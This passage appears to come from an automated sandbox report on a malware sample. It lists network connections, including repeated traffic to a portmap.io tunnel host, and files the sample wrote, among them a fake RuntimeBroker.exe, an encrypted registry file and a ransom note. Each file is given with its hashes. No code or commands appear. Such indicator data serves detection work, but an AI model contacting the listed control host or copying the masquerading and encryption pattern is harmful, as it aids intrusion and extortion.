| NL | 178.250.1.13:443 | dynamic.criteo.com | tcp |
| US | 8.8.8.8:53 | mail.easeus.com | udp |
| GB | 163.70.147.23:443 | connect.facebook.net | tcp |
| GB | 216.58.204.74:443 | content-autofill.googleapis.com | udp |
| HK | 8.218.236.152:443 | mail.easeus.com | tcp |
| GB | 54.192.137.49:443 | widget.trustpilot.com | tcp |
| US | 204.79.197.237:443 | bat.bing.com | tcp |
| US | 8.8.8.8:53 | b.delivery.consentmanager.net | udp |
| RU | 77.88.21.119:443 | mc.yandex.ru | tcp |
| NL | 23.62.61.88:443 | cdn.livechatinc.com | tcp |
| DE | 87.230.98.78:443 | b.delivery.consentmanager.net | tcp |
| HK | 8.218.236.152:443 | mail.easeus.com | tcp |
| US | 8.8.8.8:53 | rtg.prdredir.com | udp |
| US | 104.18.7.90:443 | www.easeus.com | tcp |
| US | 8.8.8.8:53 | api.livechatinc.com | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.167.187.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.31.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.147.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.137.192.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.21.88.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.98.230.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.236.218.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mc.yandex.com | udp |
| US | 8.8.8.8:53 | secure.livechatinc.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 226.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | accounts.livechatinc.com | udp |
| NL | 23.62.61.88:443 | accounts.livechatinc.com | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
| DE | 193.161.193.99:39917 | sebeee-39917.portmap.io | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | beacons4.gvt2.com | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | tcp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 8.8.8.8:53 | 35.215.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | id.google.com | udp |
| US | 142.250.113.94:443 | id.google.com | tcp |
| US | 8.8.8.8:53 | 226.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.113.250.142.in-addr.arpa | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | ogs.google.com | udp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | tcp |
| US | 8.8.8.8:53 | 3.169.217.172.in-addr.arpa | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| DE | 193.161.193.99:39917 | sebeee-39917.portmap.io | tcp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | youareanidiot.cc | udp |
| US | 172.67.143.125:443 | youareanidiot.cc | tcp |
| US | 172.67.143.125:443 | youareanidiot.cc | tcp |
| US | 8.8.8.8:53 | 125.143.67.172.in-addr.arpa | udp |
| US | 172.67.143.125:443 | youareanidiot.cc | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| DE | 193.161.193.99:39917 | sebeee-39917.portmap.io | tcp |
| DE | 193.161.193.99:39917 | sebeee-39917.portmap.io | tcp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 20.42.65.92:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 92.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| US | 8.8.8.8:53 | id.google.com | udp |
| GB | 142.250.200.3:443 | id.google.com | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 142.250.187.246:443 | i.ytimg.com | tcp |
| GB | 142.250.187.246:443 | i.ytimg.com | tcp |
| GB | 142.250.187.246:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 142.250.187.206:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | 2.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| GB | 142.250.187.246:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| GB | 142.250.200.2:443 | googleads.g.doubleclick.net | tcp |
| GB | 216.58.213.6:443 | static.doubleclick.net | tcp |
| GB | 142.250.200.10:443 | jnn-pa.googleapis.com | tcp |
| GB | 142.250.200.2:443 | googleads.g.doubleclick.net | udp |
| GB | 142.250.200.10:443 | jnn-pa.googleapis.com | udp |
| GB | 142.250.179.238:443 | www.youtube.com | udp |
| GB | 142.250.179.238:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | 2.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 185.199.109.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.113.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| DE | 193.161.193.99:39917 | sebeee-39917.portmap.io | tcp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| DE | 193.161.193.99:39917 | sebeee-39917.portmap.io | tcp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
Files
memory/1424-0-0x00007FFD0C7D3000-0x00007FFD0C7D5000-memory.dmp
memory/1424-1-0x0000000000910000-0x0000000000926000-memory.dmp
memory/1424-2-0x00007FFD0C7D0000-0x00007FFD0D291000-memory.dmp
memory/3568-5-0x00007FFD0C7D0000-0x00007FFD0D291000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ir2r3plv.cmk.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3568-10-0x00007FFD0C7D0000-0x00007FFD0D291000-memory.dmp
memory/3568-11-0x000001753AFD0000-0x000001753AFF2000-memory.dmp
memory/3568-15-0x00007FFD0C7D0000-0x00007FFD0D291000-memory.dmp
memory/3568-18-0x00007FFD0C7D0000-0x00007FFD0D291000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
memory/2948-31-0x000001A126A80000-0x000001A126C9C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d8cb3e9459807e35f02130fad3f9860d |
| SHA1 | 5af7f32cb8a30e850892b15e9164030a041f4bd6 |
| SHA256 | 2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68 |
| SHA512 | 045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184 |
memory/1016-43-0x000001E99BBC0000-0x000001E99BDDC000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 73af4f2170e957d2e0a17b3969478aae |
| SHA1 | 0cf6ed9f94648debd2f23f4b4563a07a4d8ab8b5 |
| SHA256 | b157a020262f6ab70c58265ad703ab2ed3db6baff07a471519c8d3b682c5f329 |
| SHA512 | 56d2da128397e463ed742cfc06f0e8e20bd87d439b3e164dde82da163195ac55e3fa532a427de5f3546878e2bb5532f588ea84790ca3a0e3c5cf6b242ea8572d |
memory/1424-59-0x00007FFD0C7D3000-0x00007FFD0C7D5000-memory.dmp
memory/1424-60-0x0000000002B40000-0x0000000002B4C000-memory.dmp
memory/1424-61-0x00007FFD0C7D0000-0x00007FFD0D291000-memory.dmp
memory/1424-62-0x00000000010E0000-0x00000000010EC000-memory.dmp
C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENC
| MD5 | 60b0b3fb0bf6d1307788e8c21367bead |
| SHA1 | 16a378296d1d17a399d6e7b2c470308493c1dcff |
| SHA256 | 4cd1a509102de46e0145321b036338d21463d84d8d4a56e4ab92debfe5e13cda |
| SHA512 | 3636a6f19ba0a65fdd4f9fb4526351248e77a59b7c6a4d5518497139b5a8ef97bfcd45eddaeca63aca13e0b957ffd016786bec45189b1da0a3ab186fa4e7ce1a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 56067634f68231081c4bd5bdbfcc202f |
| SHA1 | 5582776da6ffc75bb0973840fc3d15598bc09eb1 |
| SHA256 | 8c08b0cbceb301c8f960aa674c6e7f6dbf40b4a1c2684e6fb0456ec5ff0e56b4 |
| SHA512 | c4657393e0b9ec682570d7e251644a858d33e056ccd0f3eebffd0fde25244b3a699b8d9244bcdac00d6f74b49833629b270e099c2b557f729a9066922583f784 |
\??\pipe\LOCAL\crashpad_3852_EMFKEOQWSZHGPADJ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 81e892ca5c5683efdf9135fe0f2adb15 |
| SHA1 | 39159b30226d98a465ece1da28dc87088b20ecad |
| SHA256 | 830f394548cff6eed3608476190a7ee7d65fe651adc638c5b27ce58639a91e17 |
| SHA512 | c943f4cfe8615ac159cfac13c10b67e6c0c9093851dd3ac6dda3b82e195d3554e3c37962010a2d0ae5074828d376402624f0dda5499c9997e962e4cfd26444c0 |
C:\Users\Admin\Desktop\How To Decrypt My Files.html
| MD5 | d2dbbc3383add4cbd9ba8e1e35872552 |
| SHA1 | 020abbc821b2fe22c4b2a89d413d382e48770b6f |
| SHA256 | 5ca82cbc4d582a4a425ae328ad12fd198095e2854f4f87b27a4b09e91173a3be |
| SHA512 | bb5e1bbf28c10c077644136b98d8d02bfec3b3e49c0829b4d4570b30e0aea0276eb748f749a491587a5e70141a7653be1d03c463a22e44efecde2e5a6c6e5e66 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | fb63d3dc90ef9a384a5423b4ba9df29b |
| SHA1 | 375e0dbf33be028fe6720b40c83139936a6efa3c |
| SHA256 | 47dc7f0facf59e39c8776e1fa72404b3a3a11f4b799f0dbb913c4c68a99930d3 |
| SHA512 | b06fd4d1f4b1ef79c0cd169487859365d9754beddb57da8a27dc53224f81fdbea90a0b545f0dc5e177d95d2a3c443592543dc7eec878de4b57decf305512b047 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | b25d70cf6e4d5b819f4800ce2b83ac31 |
| SHA1 | 2b1e175a1e2fc3318066762ceb6b88ea6567ba58 |
| SHA256 | d593334c586a90bc87c8a90cbffde2f0460b30fb846c3ee1b61d75384c68478b |
| SHA512 | 88aac889e5abb221f0ddeff50b401a5c9142ed7f80b6ff07c6b850fa2978137d1b3e2662fe3cd0e5d9c4a2bb22b4246e4683f89af17d575b0e939895a517cf44 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 232e4bddd48134f942e5c9fc93f9d02f |
| SHA1 | f20508365b1a9d8951a7b38e74845e14a93b7158 |
| SHA256 | e94f7870f9444fdd89c4382cfc04b7145d40ac62658be398c676f25ecd4c7187 |
| SHA512 | 5e509197e701031f628f8d8689e1da3c7493e23dd3608e0c921ad179d9c99489291a4ac44125447a4411b3d8aae223afc7ef76f4bf7e462190835fbf60f16291 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | ae5a1726a6629fc05dd488bff597bd52 |
| SHA1 | 934c14219f584ea73a72cd3ced32dcb3a18b2d11 |
| SHA256 | 69abd0691b1c0939cd1029a00e84e08e0e4789110268e1aab359d2be1ed22407 |
| SHA512 | 0b39888197dc7d911728ba0da0bc199a00393c4f2c58ac77c8fc1878bc85ba8de4683f397a7f73f2f4e2d592c4c7680ba64576ed4b903f1a33f53ae2f6e5a1bc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 07055d6ef1dc9f09d4f2f95a9fd6a068 |
| SHA1 | fc3bea74ade9cba6b9afca0c591b10f2e206170b |
| SHA256 | c166e509a52e4a4cf0d850ab23d1cb2d7ad904938dfc361a01613dc2f17cdab1 |
| SHA512 | d0b9d37f1ca41660d958f06402b8c1f392e65dcfd29756048d7b1e0c07cc5b71e1f96770783ae3b538534a4acb1a47d2db72e87d3c7dfbdc1b256246fd4be717 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
| MD5 | 3e4d628210b6f2c3a96092203ea5c2eb |
| SHA1 | 6fd276cca9cb5e1e9c19a0b2f6026515ec6f1b0e |
| SHA256 | 5175b805ea8db533ac0b0153899804be3dd8b5151185ef5ef4614ce01f8acbba |
| SHA512 | 626ac7fe79f1b0dc5e8295831ad068cdef9d763ed2aeddaeb38d1de9701c0b4b04931dc2c98d4eeef89246c61dc06d8a3d81248f3eeddfdf8d9ce0db70e72b66 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | e30e02c31ecfc1a334c8378ebe80c87f |
| SHA1 | f32eb0e3bd4a1bac87f58a01a722be1ef779264d |
| SHA256 | 01834dc96fe96d8ad9e55347282f0cfce0a02d93edb6bcc4bee7b43e16f5febf |
| SHA512 | 1b0601d5774670d1a04f454c572bb917bf26cd52894d62112018dcb3275eca370f7743a697cf945452d4975e653040fafa3e5c59bca11bb0b45ebb3de3a7d76f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
| MD5 | 838a7b32aefb618130392bc7d006aa2e |
| SHA1 | 5159e0f18c9e68f0e75e2239875aa994847b8290 |
| SHA256 | ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa |
| SHA512 | 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links
| MD5 | 473c0c852edc11059de9af1946acc12a |
| SHA1 | b307a52480d05fbb3e3025b125e7923288dd2cfd |
| SHA256 | 95d3c22f39f6ec6db8a4f4659513a93827d07b8affc13dcb3330694be7385d4f |
| SHA512 | 5069edd26ff643b1668daed759c0a1b10e411f272a959b873a7f2a3c179099235213b477ff6d616df3c0159d1067fa25bcb6b480f1f85ae1fc364c3da63873bd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13363462789086969
| MD5 | fab414ecc6ba33cb4c7bd4eb8907473a |
| SHA1 | 4e79b09e48f159afd8bc9a942bfa6b92474d5d8c |
| SHA256 | e6242b964e47c017ca684366a8c390719f439deb7c70bcd759cb36dbe7dcd27c |
| SHA512 | 41a351a37532924b16360acf8cbd63a36c47cb9b9c5e4ea872b384c529228fdeeaf1e792b27432d6a9a196fc0911e51a33664f6b24b4b7ea8c4dcb156262a809 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG
| MD5 | ac81c0b595b32b20317761f5b01f9ebb |
| SHA1 | 1c04855d66867ed7ae340a869cfd3bbf5cb5cf93 |
| SHA256 | aca519ec9f8f985a595533b4905dbd6ca0b95265f89c879fe3e73881082051e6 |
| SHA512 | 7431e0a408762a59be45f80bf363354e0155c737331eb2c205b57a6ae9a5e4c2f8b7ab43e528acfa58c6ba6e25c58b7266cd468889730902eb91d8a80703b65e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History
| MD5 | b5bf88a08136648cb2192b8d4ae19efd |
| SHA1 | 99ddd4bb1596e288669d17f6e8c7bf0bbfe63b32 |
| SHA256 | 5c24fc66e83f2e099d42c64272ab18066643dc58261a6a2af246f72326117c21 |
| SHA512 | bdf33301475c799fd4542ec68cb2f3e6b1b38e92664d5887b46c2a07332d89a1621bfdb783056fd4b45327efcc99cc1a9b447380092dc085d9cfb91783bd88a2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG
| MD5 | 7831838767df1c630a425b50cc881f91 |
| SHA1 | ca126edc22ddfd4610c6aa5655f76b112ebbaa43 |
| SHA256 | 48365632fd12690fc1dcc82dfe5e8cfdba4820b07cad5b7cd4b28a1c68948699 |
| SHA512 | 4b1eb6e05fb3e32b7472c3a7da22240d8dde42d13966256ecfd94166cdb49d58e4f59d2523906f92cdb52e315f8c286a7472121544b2e2fc74585f2be7b6b2c5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db
| MD5 | 49ea266bb316c19d3ca4956ddfe24073 |
| SHA1 | 274c43d1e923efd70e944c6cfff06788b4112e39 |
| SHA256 | e34a88e504ed2c4e3d1d66a644c2688376e7b1db7cad950b545baa1078320b6f |
| SHA512 | f2386035cb1051990a0a83f346b2755dae9c2d7ee23eb4816340d570aac9d0e0e00a59d1eb30a613c496e2a7a92319c99ec3499739888f7a69dcfbbcc851399f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG
| MD5 | 9126a1bb7f31bfc893a7a4ea5f3fe022 |
| SHA1 | f732767828dec391b118590bf0efeaad2e54d714 |
| SHA256 | 39b32da6267fd1191e84db7ce4fafcf165eca10590994b6fbeb9ec77790b2794 |
| SHA512 | cd9cb8476ac03e11602830a4fc39099253ddcc2f03c6cf3e62980d2d6a1c43ed1a372972cf7f04c31e4f64132374e7b001a545cd477297e1cbfe55078ae161be |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 4e885293ceff902d3c6d67213bf1a611 |
| SHA1 | adfa42262463cb0df7dcf32bc6ba84dacabf4c5a |
| SHA256 | ff451b10c7d775b2fa67d095512fdf4094673987594156ece234fb2269cc7340 |
| SHA512 | c00686a267c6e55db30177382657fc7e075827a7f004d41ab5a969cf9bef92ebca57dc3039d56f192a6a13500a99bcf835e46d2228a0b50363e662c24f1c8e2c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache
| MD5 | 9dcab5c90c59e6f3e47945c0f04dd1c3 |
| SHA1 | 1f175e33d8ecccede6c42177d8463832b1a964e6 |
| SHA256 | 868ef629a38f608b708fdeed1de4b4573d66ea1085b5751543d5c821f59d5427 |
| SHA512 | 53ed04cc27122e40bc10214f6008340c24daebbf3cc5ef9e84a6076dff678a156c49d764063ec18d34fc01397a1f6aa64c7364279b66289aaa4f9c91289eb235 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log
| MD5 | fa1af62bdaf3c63591454d2631d5dd6d |
| SHA1 | 14fc1fc51a9b7ccab8f04c45d84442ed02eb9466 |
| SHA256 | 00dd3c8077c2cca17ea9b94804490326ae6f43e6070d06b1516dfd5c4736d94d |
| SHA512 | 2c3184f563b9a9bff088114f0547f204ee1e0b864115366c86506215f42d7dbf161bc2534ccaee783e62cc01105edffc5f5dabf229da5ebd839c96af1d45de77 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG
| MD5 | 981866cbe70c8ff0792adc4df11edde4 |
| SHA1 | 209ec8e956c0f4cba92ae5d543d770e8f78b8eba |
| SHA256 | ba51405c8aa2014ba6cbd221a8dca8cc85ca9f53a84651277ffdf51397534d2f |
| SHA512 | ef0fe9edb7f8f0c1a1a187f494d552e9686e14cfac2efa07acec2e5cfac284d645d541600a5376e0bd476c15806b8a59b71498096c76d083a73a2206fc145990 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG
| MD5 | f5474aefb0fb03898b3a22be6b97694c |
| SHA1 | d7c83eb1008bdd193ee99a67fcff2b4bda8de5f0 |
| SHA256 | 0853f9afdeca3244ff4e3b22746a18d7b82073e14534738e2a73a010dbd799a2 |
| SHA512 | e6294751a785fe51aecaba04aa9128301599016502b95f1333674fbc983b123fa8ddacb654b49e9697f963b0855e58c63c25e39b0d87e538a9624f3accbfa163 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG
| MD5 | d37b34dcf938fd6682ea98ce1cd9bcb7 |
| SHA1 | 2cf0fe2c84dbe6d6996e122ddb1c8f4586063060 |
| SHA256 | 6d3a7ee079229d1312930c603e648a303c9dc8a4f001065f6cfda49af7fec2b6 |
| SHA512 | 3d441383f79fa4a28ded31a247124969880a1ac20a54ec69a2ec5c79d46c503cae3f6e5ca3f12e17f67c837b7caf54a3d36451b66da408173f8adea690688f00 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 13fca2a6471636089c531b174b3d59f2 |
| SHA1 | df3dc472a865bb53274b07c75319c84de071da60 |
| SHA256 | 5c2777dca1c9fd2b25293b2ed57f55bee05f86763899f71dab4e591fa024ee4d |
| SHA512 | bb484e1d03bb0b7f7919ce567573bbe0a6c35c829ed0a097993ff19d4ea07c3aabc734a06ed430537faf0c969b7aff6eb806e27bbaceedff018fce63860ca87c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log
| MD5 | 7477b2094cdf5e21a91038a2e8c45422 |
| SHA1 | 0007cf3e5440dd7fcf82b4bf8f934698897169dc |
| SHA256 | 17e1537678be7b3d3afba4308f601c936740f93e37ffc537c62ab464cec6c340 |
| SHA512 | 1f52a09898e3d858e8373b744b6792674f8b37a98f61cf19e00c4d887ac638d6f6af9615e11f6e1da28f7764338719d03fc2dc227139583be809cda6f3607589 |
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres
| MD5 | 0eb80309c20b97910fd8a4e54822f1e5 |
| SHA1 | 12f1f4a440a7f6b78df1e5fb6db3b7904df02662 |
| SHA256 | cd2622c808b470e1c49605b2a274c0393ac6c7b77986bd7deddbcf3277a03e37 |
| SHA512 | 6ea57e260e6eef36b56cfb51acd004d240d27895ddfd550bc88d22e6c981a32060f2e51842a580e90e7e8b3cb05aa02018033b30fd9f4a526543921431e24308 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
| MD5 | 324d9517a7c8bc0cf2d12326801036ef |
| SHA1 | 9a59a5874a1623ad301608dfd4e9d504c13ebc38 |
| SHA256 | 600b81abc132b1662662aa22101c6e9bb79235aaf4c80598a9076be4d8aaeae2 |
